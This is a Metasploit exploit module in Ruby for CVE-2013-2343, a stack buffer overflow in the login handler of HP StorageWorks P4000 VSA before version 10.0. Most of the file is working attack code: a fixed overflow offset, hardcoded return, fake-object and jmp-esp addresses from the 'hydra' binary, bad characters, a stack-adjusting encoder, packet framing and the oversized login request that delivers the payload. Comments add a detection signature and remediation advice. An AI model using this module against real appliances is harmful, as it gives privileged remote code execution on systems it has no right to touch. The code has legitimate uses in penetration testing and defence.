Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2013-2343: a stack buffer overflow in the login
# handler of HP StorageWorks P4000 VSA (versions prior to 10.0, see
# 'Description' and the vendor advisory under 'References').
#
# The service speaks a simple framed text protocol on TCP/13838 (default
# RPORT); `check` and `exploit` both build a "login:" request with
# `generate_packet`, so the observable on the wire in either case is a single
# login message from the scanner/attacker host. Remediation per the vendor
# advisory is upgrading to a version >= 10.0.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, the
  # single x86 Linux target) and the RPORT option.
  #
  # @param info [Hash] module info merged by `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
        'Description' => %q{
          This module exploits a buffer overflow vulnerability found in HP's StorageWorks
          P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
          of the sscanf() function when parsing login requests. This module has been tested
          successfully on the HP VSA 9 Virtual Appliance.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2013-2343'],
          ['OSVDB', '94701'],
          ['ZDI', '13-179'],
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
        ],
        'Payload' => {
          # "\x2f" is '/', the field separator of the login string built in
          # `exploit`; "\x00" is the frame terminator appended by
          # `generate_packet`. CR/LF are presumably line terminators for the
          # text protocol — not shown by this file.
          'BadChars' => "\x2f\x00\x0d\x0a",
          'Space' => 780,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['linux'],
        'Arch' => ARCH_X86,
        'Targets' => [
          [
            'HP VSA 9',
            {
              # 'Version' is echoed in the `check` login string; 'Offset' is
              # the number of filler bytes `exploit` places before 'Ret'.
              # The three addresses are absolute (no ASLR/PIE assumed for the
              # hydra binary — inferred from the fixed values, confirm).
              'Version' => '9.0.0',
              'Offset' => 3446,
              'Ret' => 0x0804EB34, # pop ebp # ret # from hydra
              'FakeObject' => 0x08072E58, # from hydra data
              'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2013-06-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ]
    )
  end

  # Version check: sends one well-formed login request carrying the target's
  # 'Version' string and classifies the first response.
  #
  # @return [Exploit::CheckCode]
  #   Appears  - response contains both "OK" and "Login"
  #   Detected - response contains both "FAILED" and "version"
  #              (service present; presumably a version mismatch)
  #   Safe     - anything else, including no response at all
  def check
    connect
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
    vprint_status("#{rhost}:#{rport} Sending login packet to check...")
    sock.put(packet)
    # get_once may return nil on timeout/close; the `res and` guards below
    # keep the nil case on the Safe path.
    res = sock.get_once
    disconnect

    if res and res =~ /OK/ and res =~ /Login/
      return Exploit::CheckCode::Appears
    elsif res and res =~ /FAILED/ and res =~ /version/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Frames +data+ in the service's message layout:
  #   8 bytes  "\x00" * 7 + "\x01"
  #   4 bytes  big-endian length of data plus the trailing NUL (pack "N")
  #   12 bytes zeros
  #   8 bytes  "\x00\x00\x00\x14\xff\xff\xff\xff"
  #   data, then a single NUL terminator
  # Field meanings beyond the length are not documented in this file.
  #
  # NOTE(review): String#length is a character count; it equals the byte
  # count only for ASCII or ASCII-8BIT strings, which is what both callers
  # here pass — confirm before reusing with other input.
  #
  # @param data [String] request body, e.g. a "login:..." line
  # @return [String] the complete frame
  def generate_packet(data)
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
    pkt << [data.length + 1].pack("N*")
    pkt << "\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << data
    pkt << "\x00"

    pkt
  end

  # Sends a single oversized login request. The second field of the login
  # string is target['Offset'] bytes of random filler followed by three
  # little-endian 32-bit addresses (pack "V") and the encoded payload, so the
  # field is several kilobytes long — that size, on RPORT, is the signature
  # a network sensor can key on, since a legitimate agent name is short
  # (compare the literal used in `check`). No response is read.
  def exploit
    connect
    print_status("#{rhost}:#{rport} Sending login packet")
    my_bof = rand_text(target['Offset'])
    my_bof << [target.ret].pack("V")
    my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
    my_bof << [target['JmpEsp']].pack("V")
    my_bof << payload.encoded

    packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
    sock.put(packet)
    disconnect
  end
end